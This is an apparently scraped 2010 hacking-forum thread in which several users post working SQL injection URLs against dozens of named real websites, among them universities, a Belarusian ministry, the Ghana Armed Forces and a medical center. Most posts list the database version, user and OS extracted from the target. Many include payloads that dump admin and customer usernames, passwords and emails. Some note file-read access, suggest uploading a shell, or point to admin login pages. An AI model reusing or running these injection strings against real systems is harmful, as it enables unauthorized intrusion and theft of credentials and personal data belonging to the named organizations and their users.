http://www.mathrubhumi.com/travel/news.php?id=-25853+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),7,8,9, 10,11,12,13,14,15,16--+&cat=2&sub=6
user:mathrorg_enguser@75.125.120.228
version:5.0.90-community
http://www.edgeboston.com/index.php?ch=news&sc=&sc2=features&sc3=&id=-103259'+union+select+1,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--+
user:root@10.208.84.139
version:5.0.45
http://www.visitshrewsbury.com/newarticle.php?id=-831+union+select+1,2,concat_ws%(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,1617,18,19,20,21,22,23,24,25,26,2 7,28,29+from+mysql.user--+
user:root@94.236.19.219
version:5.0.45-log
http://www.visituganda.com/more.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1--+&&tab=get_around
user:visit_travel@localhost
version:4.0.27-standard
http://www.moodiereport.com/category.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10, 11,12,13--+
user:dbread@localhost
version:5.0.22
http://www.deauville.org/en/page.php?id=-50+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os),2,3,4--+
user:deauville@localhost
version:5.0.44-log
http://www.christianweek.org/features.php?id=55'+union+select+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os),8,9,10,11,12,13--+
user:cweek@localhost
version:5.0.67-community
http://www.ethicaltraveler.org/news_story.php?id=-1154+union+select+1,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4--+
user:imalawi_main@localhost
version:4.1.22-standard
http://www.bonnefoymichel.tourisme-vacances.eu/page-base.php?page=-27+union+select+@@version
aka_zver
18.05.2010, 22:23
Site: http://www.ifs.ing.tu-bs.de
TIC: 0
PR: 5
Example request: http://www.ifs.ing.tu-bs.de/module.php?id=49&action=download&fileid=18'+or+(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat(mid(co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os,0x0b),1,70),+floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu
============================================
Site: http://www.lead.ethz.ch
TIC: 0
PR: 4
Example request: http://www.lead.ethz.ch/module.php?id=-4+union+select+1,2,unhex(hex(concat_ws(0x0b,@@vers ion,user(),database(),@@version_compile_os))),4,5, 6,7,8,9,10,11,12,13--+
version - 4.1.18-max
user - lead@webcow20.ethz.ch
database - lead
os - Win32
KENT1994
18.05.2010, 23:26
http://www.deathdealers.eu/index.php?id=%272 UNION ALL SELECT %String_Col%--
Host IP: 91.200.35.2
Web Server: LiteSpeed
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: deathdea_normal
http://www.rugkliniek.eu/engels/index.php?ID=%273 UNION ALL SELECT %String_Col%,2,3,4,5,6,7--
Host IP: 85.234.225.22
Web Server: Apache/2.2
Powered-by: PHP/4.4.9
DB Server: MySQL
Current DB: rugklini
http://www.cordesurciel.eu/index.php?id=%270&lg=%27en AND %True_Expression%
Host IP: 213.186.33.1
Web Server: Apache/2.2.X (OVH)
Powered-by: PHP/4.4.9
DB Server: MySQL
Current DB:
http://www.karaim.eu/index.php?id=%2724&lang=%27 AND %True_Expression%
Host IP: 79.98.24.3
Web Server: Apache
DB Server: MySQL
Current DB:
http://www.see-125.eu/index.php?id=%27514 UNION ALL SELECT 1,%String_Col%,3,4,5,6--
Host IP: 83.169.72.7
Web Server: Apache
DB Server: MySQL
Current DB: see-125
http://blog.mediacorptv.net/blogshow.php?id=-76+union+select+1,user(),3,4+from+mysql.user--+
user:root@localhost
version:5.0.45-community-nt-log
http://teaspoon.ru/tea-rooms/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,user(),version(),database(),@@version_co mpile_os),15,16,17,18,19,20,21,22,23,24,25--+
user() - z86369_9829@77.221.130.19
version() - 5.0.32-Debian_7etch11-log
database() - z86369_9829
os - pc-linux-gnu
TIC - 160
Google PR - 4
http://www.aspic.edu.mx/ver_trofeos.php?id=-21+union+select+1,2,3,concat(user(),version(),data base(),@@version_compile_os)
http://www.selectsmart.com/FREE/select.php?client=-stuffy'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,version(),16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113,114,115,116,117,118,119,120, 121,122,123,124,125,126,127,128,129,130,131,132,13 3,134,135,136,137,138,139,140,141,142,143,144,145, 146,147,148,149,150,151,152,153,154,155,156,157,15 8,159,160+--+
Version: 5.0.45-log
Database: ssmart_last
User: ssmart_4@localhost
A public website of the government of North Africa, dedicated to the crisis in the country.
http://www.africancrisis.co.za/Home.php?Cat=-15+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+--+
Version: 4.1.20-max-log
Database: JanAFC_DB
User: JanAFC_Pgm@72.41.255.242
http://www.tlaclive.org/productions.php?key=87678678+union+select+1,2,3,4, 5,version(),7,8,9--+
Version: 5.0.24
Database: tlac
User: tlac_07@localhost
http://www.robertchristgau.com/get_artist.php?name=Sleater-Kinney'+union+select+1,2,3,version()+--+
Version: 4.0.20-stand
Database: thdb
User: robertchrist
http://www.leeslekker.nl/index.php?page=bestel.php&id=-7175+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),version(),database(),@@version_compile_os),9,1 0,11,12,13,14,15,16,17,18,19
www.conceptsport.co.uk/events.php?pid=-1111 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15--
www.rockcard.co.uk/choose_size.php?cid=-95 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14--
www.viewfinderphotography.co.uk/product.php?cid=-1 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),v ersion()),5,6,7,8,9,10,11,12--
thefishy.co.uk/story.php?id=-8420104 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),v ersion()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27--
[Feldmarschall]
20.05.2010, 03:27
http://www.rukhnet.com/index.php?subid=-0000+union+select+concat(version(),user(),database ()),2,3,4,5,6,7+from+information_schema.tables--
Version:5.0.90-community
User: logrukhnetc_diradmi@localhost
Database: rukhnetc_directory
http://www.rhc.org.za/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8/*
http://www.volunteerfalkirk.org.uk/news.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( 'tblOrgAims'))--
http://www.metafix.co.uk/Scripts/news.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ ('dtproperties')--
http://www.rockhill.ie/gallery/index.asp?ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ char(78)%2Bchar(101) %2Bchar(119) %2Bchar(115) %2Bchar(108) %2Bchar(101) %2Bchar(116) %2Bchar(116) %2Bchar(101) %2B char(114) %2Bchar(80) %2Bchar(114) %2Bchar(101) %2Bchar(112) %2B char(97) %2Bchar(114) %2Bchar(101) %2Bchar(100) %2Bchar(69) %2B char(109) %2Bchar(97) %2Bchar(105) %2Bchar(108) %2Bchar(115))&page=7
http://www.bradfordchamber.co.uk/news.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( char%2884%29%2Bchar%28105%29%2Bchar%2899%29%2Bchar %28107%29%2Bchar%2878%29%2Bchar%28101%29%2Bchar%28 119%29%2Bchar%28115%29%29%29--
http://www.retention.se/news.asp?id=1+SELECT+*+from+ adminuser +group+by+adminuser.userid+having+1=1#&pg=1
http://www.accomplishmanagement.co.uk/news.php?id=999999+union+select+1,concat_ws(0x3b,% 20user(),database(),version()),3,4,5,6,7/*
User: web148u1@localhost
Version: 5.0.32-Debian_7etch8-log
Database: web148db1
http://www.samsport.ie/news.php?id=999999+union+select+1,concat_ws(0x3b,% 20user(),database(),version()),3,4,5,6--
User: ssport_usr@localhost
Version: 5.0.51a-community
Database: samsport_db
http://www.klangwald.de/main/shop_details.php?id=99999+union+select+1,concat_ws (0x3a%20,user(),database(),version()),3,4/*
User: TE@localhost
Version: 4.0.17-nt
Database: klangwald
http://www.coffeytalk.com/product_details.php?id=-170+union+select+1,2,3,concat_ws(0x3b,%20user(),da tabase(),version()),5,6,7,8--
User: $coffey1@localhost
Version: 5.0.90-community
Database: coffey1_BlogNEW
http://reklama.vladinvest.ru/print_news.php?id=-5+union+select+1,2,concat_ws(0x3b,%20user(),databa se(),version()),4/*
User: ladinvestru@78.108.81.71
Version: 4.1.22
Database: vladinvestru2
http://lingvistschool.kiev.ua/news_ukr.php/news.php/forum/print/print_page_ukr.php?id=99999+union+select+1,concat_ ws(0x3b,%20user(),database(),version()),3,4,5,6--
User: 1.u_lingvistsc@localhost
Version: 5.0.44.3
Database: lingvistscho
http://www.euroforgings.com/shop2.php?id=-99999999+union+select+1,concat_ws(0x3a%20,user(),d atabase(),version()),3,4,5/*
User: euroforg_root@localhost
Version: 4.1.22-standard
Database: euroforg_alku2
http://www.ideja.edu.lv/index.php?content_id=-8+union+select+1,2,concat_ws(char(32),user(),versi on(),database(),@@version_compile_os),4,5,6,7,8,9, 10,11+from+information_schema.tables--
Ahead of the Russian national hockey team's game against Canada :)
http://www.thelamp.ca/film/index.php?id=27+union+select+1,2,concat_ws(0x3a,ve rsion(),da tabase(),user())%20,4,5,6,7,8,9--
Version : 5.1.39-log
Database : lamp
User : catmac@apache2-grog.galaga.dreamhost.com
OS : pc-linux-gnu
-----------------------------------------------------------
http://youthscienceforum.ca/view.php?id=17+and+1=2+union+select+1,2,3,aes_decr ypt(aes_encrypt(concat_ws(0x3a,version(),d atabase(),user()),0x71),0x71),5,6--
Version : 5.0.19-standard
Database : youthscienceforum
User : youthscience@205.207.185.71
OS : apple-darwin8.2.1 :)
http://www.igert.neu.edu/profile.php?pid=-16+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12
Database Version: 5.0.77-log
Database name: igert
User name: igert@localhost
http://www.rom.on.ca/programs/lectures/index.php?ref=showinfo&program_id=-5507+UNION+SELECT+1,GROUP_CONCAT(AES_DECRYPT(AES_E NCRYPT(COLUMN_NAME,1),1)),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TAB LE_NAME='romcart_users'%23
http://www.uk.playright.dk/firma.php?id=-14+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12+from+mysql.user
http://myaso-portal.ru/news_records_view.php?id=-3458+and+1=2+union+select+1,concat_ws(0x3a,user,pa ss),3,4,5,6,7,8,9,10+from+userlist+limit+1,1--
http://myaso-portal.ru/admin/
you could try uploading a shell
MS_access
http://www.ohiocampuscompact.org/page.cfm?ID=-181+union+select+1,2,3,4,5,6,7,8,9+from+pagetext1
PR-5
---------------------------------------------
http://www.jnht.com/heritage_site.php?id=-289+union+select+1,2,concat_ws(user(),version(),da tabase(),@@version_compile_os),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--
PR-6
---------------------------------------------
http://www.sadarvuga.com/php/project.php?id=-59+union+select+0,group_concat(username,char(58),p assword)+from+users
PR-4
--------------------------------------------
http://www.gemidiriya.com/news_view.php?record_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(char(32),user(),version(),database(),@@version_ compile_os,@@datadir),1),1),group_concat(table_nam e),5,6+from+information_schema.tables+where+table_ schema=CHAR(103,97,109,97,110,101,103,95,119,101,9 8,100,98)
PR-4
-------------------------------------------
http://www.buyabans.com/subcats.php?range_id=2&cat_id=-25+union+select+concat_ws(user(),version(),databas e(),@@version_compile_os)&subcat_id=41
PR-5
daniel_1024
22.05.2010, 22:25
PR 6
TIC 110
http://www.ecoculture.ru/ecolibrary/article.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10--
Version = 4.1.20
Current User = libsites@localhost
Current Database = ecoculture_db01
PR 6
TIC 40
http://vmo.rgub.ru/policy/article.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12--
Version = 5.1.37-1ubuntu5.1
Current User = root@localhost
Current Database = vmo_db01
PR 5
TIC 120
http://www.radiotec.ru/catalog.php?cat=jr14&art=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
Version = 5.0.90-community
Current User = radiotec_raduser@localhost
Current Database = radiotec_mainbase
PR 5
http://www.prsn.uprm.edu/English/Informe_Sismo/myinfoGeneral.php?ID=2010010522363609+and+1=0+unio n+select+0,1,2,3,4,5,6,7,8,9,10,11,12--
Version = 5.1.42
Powered by = PHP/5.3.1
Current User = webmysql@localhost
Current Database = dbase_tsunami
PR 8
http://www.polimi.it/index.php?id=3517&tx_wfqbe_pi1%5Bid%5D=6309+and+1=0+union+select+0,1 ,2,3,4,5,6--
Version = 5.0.85-log
Powered by = PHP/5.2.13
Current User = polimi@localhost
Current Database = polimi
aka_zver
22.05.2010, 23:12
Site: http://iksz.hu
TIC: 0
PR: 4
Example request: http://iksz.hu/rateit.php?id=999'+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - iksz@web.jail
database - iksznews
os - portbld-freebsd7.0
============================================
Site: http://jjc.yangtzeu.edu.cn
TIC: 0
PR: 4
Example requests: http://jjc.yangtzeu.edu.cn/list.php?typeid=-2+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),4,5,6,7--+
http://jjc.yangtzeu.edu.cn/list.php?typeid=-2+union+select+1,2,group_concat(uname,0x3a,pwd,0x3 a,email),4,5,6,7+from+jjc_admin--+
version - 5.0.45-community-nt-log
user - root@localhost
database - jjc
os - Win32
============================================
Site: http://www.stedenbandeindhoven.nl
TIC: 0
PR: 4
Example request: http://www.stedenbandeindhoven.nl/module.php?ID=68+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( concat_ws(0x0b,version(),user(),database(),@@versi on_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - chinandega_u@localhost
database - chinandega_splace
os - pc-linux-gnu
============================================
Site: http://www.countryclub.at
TIC: 10
PR: 3
Example request: http://www.countryclub.at/v2/module.php?id=-42'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_con cat(0x0b,username,0x3a,password),concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),14 ,15,16,17,18,19+from+access--+
version - 5.0.45
user - countryclub_at@localhost
database - countryclub_at_-_db1
os - redhat-linux-gnu
============================================
Site: http://www.imaculadanet.com.br
TIC: 0
PR: 1
Example request: http://www.imaculadanet.com.br/site/eventos.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),group_concat(0x0 b,table_name),5,6+from+information_schema.tables--+
version - 5.0.51a-24+lenny3-log
user - site_www@localhost
database - www
os - debian-linux-gnu
============================================
Site: http://xcc.paragliding.pl
TIC: 0
PR: 1
Example requests: http://xcc.paragliding.pl/module.php?id=26&contest=PL&l=pl&date=20090606&competitorid=-100964+union+select+1,2,3,4,concat_ws(0x0b,version (),user(),database(),@@version_compile_os),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33--+
http://xcc.paragliding.pl/module.php?id=26&contest=PL&l=pl&date=20090606&competitorid=-100964+union+select+1,2,3,4,group_concat(0x0b,colu mn_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33+from+inform ation_schema.columns+where+table_name=0x7068706262 5F7573657273--+
version - 5.0.26
user - web16@localhost
database - xcc_2009
os - suse-linux-gnu
============================================
Site: http://www.ondernemersparlement.nl
also
http://www.onlineparlement.nl
also
http://www.webocratics.com
TIC: 0
PR: 0
Example requests: http://www.ondernemersparlement.nl/module.php?ID=5180+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os),floor(rand(0)*2)))--+
http://www.onlineparlement.nl/module.php?ID=999+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (concat_ws(0x0b,version(),user(),database(),@@vers ion_compile_os),floor(rand(0)*2)))--+
http://www.webocratics.com/module.php?ID=999+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (concat_ws(0x0b,version(),user(),database(),@@vers ion_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - webocratic_u@localhost
database - webocratic_splace
os - pc-linux-gnu
============================================
Site: http://www.terranet-berlin.de
TIC: 0
PR: 0
Example request: http://www.terranet-berlin.de/dias/module.php?id=-44+union+select+1,2,3,4,concat_ws(0x0b,version(),u ser(),database(),@@version_compile_os),6,7,8,9--+
version - 4.0.27-max-log
user - dbo128602669@212.227.118.34
database - db128602669
os - pc-linux-gnu
============================================
Site: http://www.beoordeelmijndocent.nl
TIC: 0
PR: 0
Example request: http://www.beoordeelmijndocent.nl/module.php??moduleID=77&menuID=1913+or+(select+count(*)+from+(select+1+uni on+select+2+union+select+3)x+group+by+concat(conca t_ws(0x0b,version(),user(),database(),@@version_co mpile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bmd@localhost
database - bmd
os - pc-linux-gnu
============================================
Site: http://data.weetmeer.nl
TIC: 0
PR: ?
Example request: http://data.weetmeer.nl/module.php?ID=68565+or+(select+count(*)+from+(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(concat_ws(0x0b,version(),user(),database(),@@ve rsion_compile_os),floor(rand(0)*2)))--+
version - 5.0.81-log
user - weetmeer_beta@localhost
database - weetmeer_beta
os - pc-linux-gnu
============================================
Site: http://ifs.rz.tu-bs.de
TIC: 0
PR: ?
Example request: http://ifs.rz.tu-bs.de/module.php?id=49&action=download&fileid=-18'+or+(select+count(*)+from+(select+1+union+selec t+2+union+select+3)x+group+by+concat(concat_ws(0x0 b,version(),user(),database(),@@version_compile_os ),floor(rand(0)*2)))--+
version - 5.0.45
user - de@localhost
database - de
os - redhat-linux-gnu
wildshaman
23.05.2010, 13:23
Ministry of Communications and Informatization of the Republic of Belarus
http://www.mpt.gov.by/new/modules/fotoar/index.php?sub&id=13+and+substring(version(),1,1)=4
MySQL version 4, there is a filter on union
aka_zver
23.05.2010, 15:33
Site: http://www.informatikcenter.de
TIC: 10
PR: 3
Example request: http://www.informatikcenter.de/redaktion/download.php?id=57'+or+(select+count(*)+from+(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(concat_ws(0x0b,version(),user(),database(),@@ve rsion_compile_os),floor(rand(0)*2)))--+&type=file
version - 5.0.51a-24+lenny3
user - IN-06030001@localhost
database - IN-06030001
os - debian-linux
============================================
Site: http://www.oldrelics.com
TIC: 0
PR: 3
Example request: http://www.oldrelics.com/cms.php?id=-6+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),group_concat(0x0b, login_id,0x3a,password)+from+relics_admin--+
version - 5.0.91-log
user - custom_new@68.178.254.164
database - custom_new
os - unknown-linux-gnu
============================================
Site: http://www.pmaoakridge.com
TIC: 0
PR: 3
Example request: http://www.pmaoakridge.com/news_events_detail.php?news_events_id=-87+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),3,4,5,6--+
version - 4.1.24-max-log
user - cayote55@208.109.14.112
database - cayote55
os - redhat-linux-gnu
============================================
Site: http://fuchsschafzucht-wechselberg.de
TIC: 0
PR: 1
Example request: http://fuchsschafzucht-wechselberg.de/cms.php?id=5+or+(select+count(*)+from+(select+1+un ion+select+2+union+select+3)x+group+by+concat(conc at_ws(0x0b,version(),user(),database(),@@version_c ompile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch11-log
user - fuchsschafzucht@srv45.one.com
database - fuchsschafzucht
os - pc-linux-gnu
============================================
Site: http://www.kgmotorsport.com
TIC: 0
PR: 1
Example requests: http://www.kgmotorsport.com/cms.php?id=-4'+union+select+1,2,3,group_concat(0x0b,login_id,0 x3a,password,0x3a,email),5,6,7,8,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),10 ,11+from+sysadmin--+
http://www.kgmotorsport.com/cms.php?id=-4'+union+select+1,2,3,group_concat(0x0b,login,0x3a ,password,0x3a,email),5,6,7,8,now(),10,11+from+cus tomers--+
version - 5.0.89-community
user - web161-kgmotor@localhost
database - web161-kgmotor
os - pc-linux-gnu
============================================
Site: http://www.chisca.ca
TIC: 0
PR: 0
Example query: http://www.chisca.ca/cms.php?id=-18'+union+select+1,2,3,4,unhex(hex(concat_ws(0x0b, version(),user(),database(),@@version_compile_os)) ),6,7,8,9--+
version - 4.1.18-nt
user - chiscacarl_71463@216.10.251.120
database - chiscanew_71463
os - Win32
============================================
Site: http://www.homesurveysolutions.com
TIC: 0
PR: 0
Example query: http://www.homesurveysolutions.com/cms.php?ID=-12'+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),3,4,group_concat (0x0b,table_name),6,7,8,9+from+information_schema. tables--+
version - 5.0.89-community
user - web247-hss@localhost
database - web247-hss
os - pc-linux-gnu
Ghana Armed Forces
http://www.gaf[antigoogle].mil.gh/index.php?CatId=80+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15--
user() : dbo156151652@212.227.119.15
version() : 4.0.27-max-log
database() : db156151652
OS : pc-linux-gnu
PR - 5
admin panel (http://www.gaf.mil.gh/admin/login.php)
CyberHunter
24.05.2010, 22:12
http://www.gdnet.org/cms.php?id=conference_details&conference_id=-11%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
User: browse@cweb3
Database: gdnet
Version: 5.0.45
There is a users table here too, but I can't get the data out.
http://www.gdnet.org/cms.php?id=conference_details&conference_id=-11%27+union+select+1,2,group_concat%28column_name% 29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29+from+information_schema.c olumns+where+table_name=%27users%27--+
If anyone knows how to output the user's login;pass, write me a PM.
aka_zver
24.05.2010, 23:05
Site: http://www.erf.org.eg
TIC: 10
PR: 7
Example query: http://www.erf.org.eg/cms.php?id=conferences_details&conference_id=-2+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31--+
version - 4.1.20
user - root@localhost
database - newerf
os - redhat-linux-gnu
============================================
Site: http://www.code-corner.com
TIC: 0
PR: 6
Example query: http://www.code-corner.com/cms.php?id=portfolio_listing&company_category_id=-3+union+select+concat_ws(0x0b,version(),user(),dat abase(),@@version_compile_os),2,3,4,5,6,group_conc at(0x0b,username,0x3a,pass,0x3a,email),8,9,10,11,1 2,13,14,15+from+admin--+
version - 5.1.41
user - corners_corners@localhost
database - corners_corners
os - unknown-linux-gnu
============================================
Site: http://english.anqahe.org
TIC: 0
PR: 5
Example queries: http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,now(),7,group_concat(0x0b ,username,0x3a,pass),9,10,11,12,13+from+admin--+
http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,now(),7,group_concat(0x0b ,username,0x3a,pass),9,10,11,12,13+from+users--+
http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,concat_ws(0x0b,version(), user(),database(),@@version_compile_os),7,group_co ncat(0x0b,email),9,10,11,12,13+from+member--+
version - 5.1.41
user - anqahe_anqahe_en@localhost
database - anqahe_anqahe_en
os - unknown-linux-gnu
============================================
Site: http://www.humanas.unal.edu.co
TIC: 10
PR: 5
Example query: http://www.humanas.unal.edu.co/cms.php?id=940+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os),floor(rand(0)*2)))--+
version - 5.1.42-log
user - accesocms@www.humanas.unal.edu.co
database - cms
os - unknown-freebsd
============================================
Site: http://www.bota.org.uk
TIC: 0
PR: 4
Example query: http://www.bota.org.uk/cms.php?id=-93'+union+select+1,2,3,concat_ws(0x0b,version(),us er(),database(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15--+
version - 4.1.20
user - bota@localhost
database - bota
os - redhat-linux-gnu
============================================
Site: http://www.aptekaslonik.pl
TIC: 0
PR: 4
Example query: http://www.aptekaslonik.pl/index.php?c=483)+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( concat_ws(0x0b,version(),user(),database(),@@versi on_compile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch8
user - aptekaslonik@localhost
database - aptekaslonik
os - pc-linux-gnu
============================================
Site: http://www.autismbuddy.com
TIC: 0
PR: 4
Example query: http://www.autismbuddy.com/cms.php?id=-2+union+select+concat_ws(0x0b,version(),user(),dat abase(),@@version_compile_os)--+
version - 4.1.22-standard
user - autism_autism@localhost
database - autism_myautismbuddy
os - pc-linux-gnu
============================================
Site: http://meirmedicalcenter.org
TIC: 0
PR: 3
Example query: http://meirmedicalcenter.org/cms.php?id=-8+union+select+1,group_concat(0x0b,version(),0x0b, user(),0x0b,database(),0x0b,@@version_compile_os,0 x0b,admin_userid,0x3a,admin_password),3,4,5,6,7,8, 9+from+tbl_admin--+
version - 5.0.91-log
user - mmcdb@68.178.254.230
database - mmcdb
os - unknown-linux-gnu
Site www.k-rabota.ru
http://www.k-rabota.ru/resume/index.php?id=560+and+substring%28version%28%29,1,1 %29=5--+
===========================================
This is a blind SQL injection
version() - 5.1. ... (didn't bother determining the rest)
user() - k-rabota@localhost
database() - k-rabota
os - portbld-freebsd
aka_zver
25.05.2010, 17:09
Site: http://www.liveauctiontalk.com
TIC: 0
PR: 3
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),4,group_concat( 0x0b,login_id,0x3a,password),6,7,8,9,10+from+lat_a dmin--+
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,now(),4,group_concat(0x0b,cust omer_id,0x3a,password,0x3a,email),6,7,8,9,10+from+ lat_customer--+
version - 5.0.77
user - liveauction@204.12.36.28
database - liveauction
os - redhat-linux-gnu
==========================================
Site: http://www.thebomarestaurant.com
TIC: 0
PR: 1
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+distinct+1,concat_ws(0x0b,version (),user(),database(),@@version_compile_os),group_c oncat(0x0b,vfsl_mem_email)+from+vfsl_member--+
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+1,2,group_concat(0x0b,vfsl_adm_lo g_id,0x3a,vfsl_adm_pass,0x3a,vfsl_adm_email)+from+ vfsl_admin--+
version - 5.0.26-standard-log
user - dbvfsl@202.191.42.18
database - vfsl
os - pc-linux-gnu
==========================================
Site: http://ricebrokeronline.com
TIC: 0
PR: 1
http://ricebrokeronline.com/cms.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_name,0 x3a,password),5,6,7,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os)+from+administra tor--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBRICEBROKER
os - UNKNOWN-LINUX-GNU
==========================================
Site: http://e-ricelab.com
TIC: 0
PR: 1
http://e-ricelab.com/cms.php?id=-4+union+select+1,2,3,group_concat(0x0b,user_name,0 x3a,password),5,6,7,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os)+from+administra tor--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBERICELAB
os - UNKNOWN-LINUX-GNU
http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME)+from +information_schema.tables--
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),2,3,4, 5+--
version : 4.1.22-log
user : u15962@localhost
database : u15962
os : portbld-freebsd6.2
didn't find a table with user names, only pwd
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+group_concat(pwd,0x3a+SEP ARATOR+0x0b),2,3,4,5+from+users+--
there is file read access
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+select+load_file(0x2f686f6d652f) ,2,3,4,5+from+users+--
aka_zver
26.05.2010, 16:42
Site: http://www.wifiarab.com
TIC: 0
PR: 3
